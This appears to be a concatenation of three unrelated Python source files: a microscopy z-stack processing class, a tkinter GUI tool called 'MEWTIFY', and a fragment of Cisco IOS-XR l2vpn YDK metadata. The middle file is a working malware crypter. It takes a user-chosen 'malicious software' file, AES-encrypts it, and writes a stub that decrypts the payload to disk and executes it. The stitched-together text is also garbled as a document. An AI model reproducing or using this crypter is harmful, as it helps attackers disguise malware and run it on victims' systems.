self.did_split_channels = True
self.stacks = {}
md = self.validated_mm_metadata.copy()
if self.has_valid_channel_inds:
for channel_name in (self.laser_405, self.laser_488):
channel_md = md.loc[md.channel_ind == self.channel_inds[channel_name]]
self.global_metadata.update(
self.tag_and_coerce_metadata(channel_md.iloc[0], tag=channel_name)
)
self.stacks[channel_name] = self.concat_pages(channel_md.page_ind.values)
elif self.safe_to_split_in_half:
n = int(md.shape[0]/2)
self.stacks[self.laser_405] = self.concat_pages(md.iloc[:n].page_ind.values)
self.stacks[self.laser_488] = self.concat_pages(md.iloc[n:].page_ind.values)
else:
self.event_logger('Unable to safely split pages by channel')
self.did_split_channels = False
def concat_pages(self, page_inds):
'''
'''
stack = np.array([self.tiff.pages[ind].asarray() for ind in page_inds])
return stack
def project_stack(self, channel_name, axis, dst_filepath=None):
'''
Generate x-, y-, or z-projections and log the max and min intensities
'''
axis_inds = {'x': 1, 'y': 2, 'z': 0}
if axis not in axis_inds.keys():
raise ValueError("Axis must be one of 'x', 'y', or 'z'")
axis_ind = axis_inds[axis]
try:
proj = self.stacks[channel_name].max(axis=axis_ind)
minmax = {
'min_intensity': int(proj.min()),
'max_intensity': int(proj.max()),
}
self.global_metadata.update(self.tag_and_coerce_metadata(minmax, tag=channel_name))
if dst_filepath is not None:
tifffile.imsave(dst_filepath, proj)
except Exception:
self.event_logger(
'An error occured while %s-projecting the %s channel' % (axis, channel_name)
)
def calculate_z_profiles(self, channel):
'''
Calculate various statistics of the intensities for each z-slice
'''
stack = self.stacks[channel]
return {
'min': np.array([zslice.min() for zslice in stack]).astype(int),
'max': np.array([zslice.max() for zslice in stack]).astype(int),
'mean': np.array([zslice.mean() for zslice in stack]).astype(int),
'p9999': np.array([np.percentile(zslice, 99.99) for zslice in stack]).astype(int),
}
@staticmethod
def find_cell_layer(stack):
'''
Estimate the center of the cell layer using the center of mass
of the z-profile of the mean intensity of the Hoechst staining
'''
# z-profile of the mean intensity in the Hoechst channel
raw_profile = np.array([zslice.mean() for zslice in stack]).astype(float)
profile = raw_profile - raw_profile.mean()
profile[profile < 0] = 0
x = np.arange(len(profile))
center_of_mass = (profile * x).sum()/profile.sum()
return center_of_mass, raw_profile
def align_cell_layer(
self, cell_layer_bottom, cell_layer_top, step_size, bottom_wiggle_room=0
):
'''
Approximately align the 405 and 488 stacks to correct for chromatic aberration,
and crop around the cell layer so that it is in the center of the stack
cell_layer_bottom : the position of the bottom of the cell layer, in microns,
relative to the center of the cell layer (should be negative)
cell_layer_top : the position of the top of cell layer, in microns,
relative to the center (should be positive)
step_size : the z-step size of the stack (in microns)
(note that the step size is not included in the MicroManager metadata,
so it must be provided by the user)
bottom_wiggle_room : optional 'wiggle room', in microns, for the cell_layer_bottom;
if the actual bottom of the stack is within this distance of cell_layer_bottom,
the stack is still cropped, and the bottom of the cropped stack padded with zeros.
For example, if cell_layer_bottom is -5um but the actual bottom is at -4.5um,
setting bottom_wiggle_room to 1um would allow the stack to be cropped
(because -4.5 + 5 < 1)
'''
stacks = {}
result = {}
stack_405 = self.stacks[self.laser_405].copy()
stack_488 = self.stacks[self.laser_488].copy()
# hard-coded chromatic aberration offset in microns
# this is an empirically estimated median offset,
# obtained by inspecting z-stacks from nucleus-localized targets
chromatic_aberration_offset = 1.0
offset_ind = int(chromatic_aberration_offset/step_size)
stack_405 = stack_405[:-offset_ind, :, :]
stack_488 = stack_488[offset_ind:, :, :]
# estimate the cell layer center and round it the nearest z-slice
cell_layer_center, _ = self.find_cell_layer(stack_405)
cell_layer_center = np.round(cell_layer_center)
# absolute position, in number of z-slices, of the top and bottom of the cell layer
bottom_ind = int(np.floor(cell_layer_center + cell_layer_bottom/step_size))
top_ind = int(np.ceil(cell_layer_center + cell_layer_top/step_size))
# log some parameters (for debugging, mostly)
result['padded'] = False
result['stack_shape'] = stack_405.shape
result['crop_window'] = [bottom_ind, top_ind]
result['cell_layer_center'] = cell_layer_center
result['chromatic_aberration_offset'] = offset_ind
pad_depth = None
if bottom_ind < 0:
if abs(bottom_ind) <= np.round(bottom_wiggle_room/step_size):
pad_depth = abs(bottom_ind)
bottom_ind = 0
else:
result['error'] = 'The cell layer center was too close to the bottom of the stack'
return stacks, result
if top_ind >= stack_405.shape[0]:
result['error'] = 'The cell layer center was too close to the top of the stack'
return stacks, result
stack_405 = stack_405[bottom_ind:top_ind, :, :]
stack_488 = stack_488[bottom_ind:top_ind, :, :]
# pad the bottom of the stack if necessary
if pad_depth:
result['padded'] = True
result['pad_depth'] = pad_depth
padding = np.zeros((pad_depth, *stack_405.shape[1:]), dtype=stack_405.dtype)
stack_405 = np.concatenate((padding, stack_405), axis=0)
stack_488 = np.concatenate((padding, stack_488), axis=0)
stacks = {'405': stack_405, '488': stack_488}
return stacks, result
|
#!/usr/bin/env python3
import tkinter as tk
import binascii, pyaes, sys, base64, os.path, os
from tkinter import *
from pathlib import Path
from tkinter.font import Font
from tkinter.filedialog import askopenfilename
import secrets
import string
def main():
global entry3
input2 = entry3.get()
# Open file
file_name = malwarename # Malware path
new_file_name = input2 # Path to drop file
file = open(file_name, "rb")
file_data = file.read()
file.close()
# Crypt file data (Using AES)
key = bytearray(ran_string, 'UTF-8') # 16 bytes key - change for your key
aes = pyaes.AESModeOfOperationCTR(key)
crypto_data = aes.encrypt(file_data)
# Create Stub in Python File
stub = "import pyaes\n"
stub += "import sys\n"
stub += "crypto_data_hex = " + str(crypto_data) + "\n"
stub += "key = " + str(key) + "\n"
stub += "new_file_name = \"" + str(new_file_name) + "\"\n"
stub += "aes = pyaes.AESModeOfOperationCTR(key)\n"
stub += "crypto_data = crypto_data_hex\n"
stub += "decrypt_data = aes.decrypt(crypto_data)\n"
# Save file
stub += "new_file = open(new_file_name, 'wb')\n"
stub += "new_file.write(decrypt_data)\n"
stub += "new_file.close()\n"
# Execute file
stub += "import subprocess\n"
stub += 'proc = subprocess.Popen("python "+new_file_name, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n'
# Save the Stub
stub_name = str(input2)
stub_file = open(stub_name, "w")
stub_file.write(stub)
stub_file.close()
return
def fname():
global malwarename
malwarename = askopenfilename()
return malwarename
N=16
ran_string = ''.join(secrets.choice(string.ascii_uppercase + string.digits)
for i in range(N))
# GUI Dimensions
HEIGHT = 500
WIDTH = 700
root = tk.Tk()
# GUI NAME AND SIZE
root.title("MEWTIFY")
canvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)
canvas.pack()
background_image = tk.PhotoImage(file='yaj.png')
background_label = tk.Label(root, image=background_image)
background_label.image= background_image
background_label.place(relwidth=1,relheight=1)
root.resizable(False, False)
# GUI HEADER
frame = tk.Frame(root, bg='#80C1FF', bd=5)
frame.place(relx=0.5, rely=0.05, relwidth=1, relheight=0.2, anchor='n')
label = tk.Label(frame, text="Welcome to Mewtify!", font=("-weight bold", 27), bg='#80C1FF')
label.place(relx=0.3, rely=0, relwidth=.5, relheight=1)
# INPUT 1
label2 = tk.Label(root, text="Malicious Software with full path:", anchor='w', font=15)
label2.place(relx=0, rely=0.35, relwidth=0.4, relheight=0.10)
filebutton = tk.Button(root, text="Select", font=40, command=fname)
filebutton.place(relx=.5, rely=0.35, relwidth=0.45, relheight=0.09)
# INPUT2
label3 = tk.Label(root, text="Name of Mutated Software:", anchor='w', font=15)
label3.place(relx=0, rely=0.5, relwidth=0.4, relheight=0.10)
entry3 = tk.Entry(root, font=40)
entry3.place(relx=.5, rely=0.5, relwidth=0.45, relheight=0.09)
entry3.focus_set()
# button mashing
button = tk.Button(root, text="MEWTIFY", bg="purple", font=40, command=main)
button.place(relx=0.3, rely=0.8, relwidth=0.45, relheight=0.15)
button1=tk.Button(root, text="click to exit", bg= "red", font =10,command=root.destroy)
button1.place(relx=.8, rely=0.9, relwidth=0.15, relheight=0.05)
root.mainloop()
|
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'FlowLabelTlvCodeEnum' : _MetaInfoEnum('FlowLabelTlvCodeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'17':'Y_17',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BackupDisableEnum' : _MetaInfoEnum('BackupDisableEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'never':'never',
'delay':'delay',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetFormatEnum' : _MetaInfoEnum('BgpRouteTargetFormatEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LoadBalanceEnum' : _MetaInfoEnum('LoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'source-dest-mac':'source_dest_mac',
'source-dest-ip':'source_dest_ip',
'pseudowire-label':'pseudowire_label',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterworkingEnum' : _MetaInfoEnum('InterworkingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'ipv4':'ipv4',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PwSwitchingPointTlvEnum' : _MetaInfoEnum('PwSwitchingPointTlvEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'hide':'hide',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacAgingEnum' : _MetaInfoEnum('MacAgingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'absolute':'absolute',
'inactivity':'inactivity',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Tpv3SequencingEnum' : _MetaInfoEnum('L2Tpv3SequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPort1Enum' : _MetaInfoEnum('ErpPort1Enum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port0':'port0',
'port1':'port1',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceProfileEnum' : _MetaInfoEnum('InterfaceProfileEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'snoop':'snoop',
'dhcp-protocol':'dhcp_protocol',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2EncapsulationEnum' : _MetaInfoEnum('L2EncapsulationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan':'vlan',
'ethernet':'ethernet',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceTrafficFloodEnum' : _MetaInfoEnum('InterfaceTrafficFloodEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'traffic-flooding':'traffic_flooding',
'enable-flooding':'enable_flooding',
'disable-flooding':'disable_flooding',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnLoggingEnum' : _MetaInfoEnum('L2VpnLoggingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetRoleEnum' : _MetaInfoEnum('BgpRouteTargetRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'both':'both',
'import':'import_',
'export':'export',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPortEnum' : _MetaInfoEnum('ErpPortEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'virtual':'virtual',
'interface':'interface',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacWithdrawBehaviorEnum' : _MetaInfoEnum('MacWithdrawBehaviorEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'legacy':'legacy',
'optimized':'optimized',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpCookieSizeEnum' : _MetaInfoEnum('L2TpCookieSizeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'zero':'zero',
'four':'four',
'eight':'eight',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'StormControlEnum' : _MetaInfoEnum('StormControlEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'unicast':'unicast',
'multicast':'multicast',
'broadcast':'broadcast',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpSignalingProtocolEnum' : _MetaInfoEnum('L2TpSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'l2tpv3':'l2tpv3',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'RplRoleEnum' : _MetaInfoEnum('RplRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'owner':'owner',
'neighbor':'neighbor',
'next-neighbor':'next_neighbor',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLimitActionEnum' : _MetaInfoEnum('MacLimitActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'flood':'flood',
'no-flood':'no_flood',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TypeOfServiceModeEnum' : _MetaInfoEnum('TypeOfServiceModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'reflect':'reflect',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacNotificationEnum' : _MetaInfoEnum('MacNotificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-notif':'no_notif',
'syslog':'syslog',
'trap':'trap',
'syslog-snmp':'syslog_snmp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnVerificationEnum' : _MetaInfoEnum('L2VpnVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LdpVplsIdEnum' : _MetaInfoEnum('LdpVplsIdEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'two-byte-as':'two_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLearnEnum' : _MetaInfoEnum('MacLearnEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'default-learning':'default_learning',
'enable-learning':'enable_learning',
'disable-learning':'disable_learning',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PortDownFlushEnum' : _MetaInfoEnum('PortDownFlushEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port-down-flush':'port_down_flush',
'enable-port-down-flush':'enable_port_down_flush',
'disable-port-down-flush':'disable_port_down_flush',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnCapabilityModeEnum' : _MetaInfoEnum('L2VpnCapabilityModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'high-mode':'high_mode',
'single-mode':'single_mode',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSignalingProtocolEnum' : _MetaInfoEnum('MplsSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'ldp':'ldp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetEnum' : _MetaInfoEnum('BgpRouteTargetEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-stitching':'no_stitching',
'stitching':'stitching',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ControlWordEnum' : _MetaInfoEnum('ControlWordEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PreferredPathEnum' : _MetaInfoEnum('PreferredPathEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'te-tunnel':'te_tunnel',
'ip-tunnel':'ip_tunnel',
'tp-tunnel':'tp_tunnel',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BridgeDomainTransportModeEnum' : _MetaInfoEnum('BridgeDomainTransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'FlowLabelLoadBalanceEnum' : _MetaInfoEnum('FlowLabelLoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'receive':'receive',
'transmit':'transmit',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteDistinguisherEnum' : _MetaInfoEnum('BgpRouteDistinguisherEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'auto':'auto',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpapsEnum' : _MetaInfoEnum('ErpapsEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'interface':'interface',
'bridge-domain':'bridge_domain',
'xconnect':'xconnect',
'none':'none',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'VccvVerificationEnum' : _MetaInfoEnum('VccvVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'lsp-ping':'lsp_ping',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TransportModeEnum' : _MetaInfoEnum('TransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'vlan':'vlan',
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSequencingEnum' : _MetaInfoEnum('MplsSequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'transmit':'transmit',
'receive':'receive',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacSecureActionEnum' : _MetaInfoEnum('MacSecureActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'restrict':'restrict',
'none':'none',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting.PwRoutingBgp' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing-bgp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting',
False,
[
_MetaInfoClassMember('pw-routing-bgp', REFERENCE_CLASS, 'PwRoutingBgp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp',
[], [],
''' Enable Autodiscovery BGP Pseudowire-routing BGP
''',
'pw_routing_bgp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing-global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire-routing Global ID
''',
'pw_routing_global_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Neighbor',
False,
[
_MetaInfoClassMember('ldp-flap', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable targetted LDP session flap action
''',
'ldp_flap',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port0 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port0 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
False,
[
_MetaInfoClassMember('erp-port0', REFERENCE_LIST, 'ErpPort0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
[], [],
''' Configure ERP main port0
''',
'erp_port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
False,
[
_MetaInfoClassMember('port', REFERENCE_ENUM_CLASS, 'ErpPort1Enum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPort1Enum',
[], [],
''' ERP main port number
''',
'port',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'RplRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'RplRoleEnum',
[], [],
''' RPL role
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'rpl',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
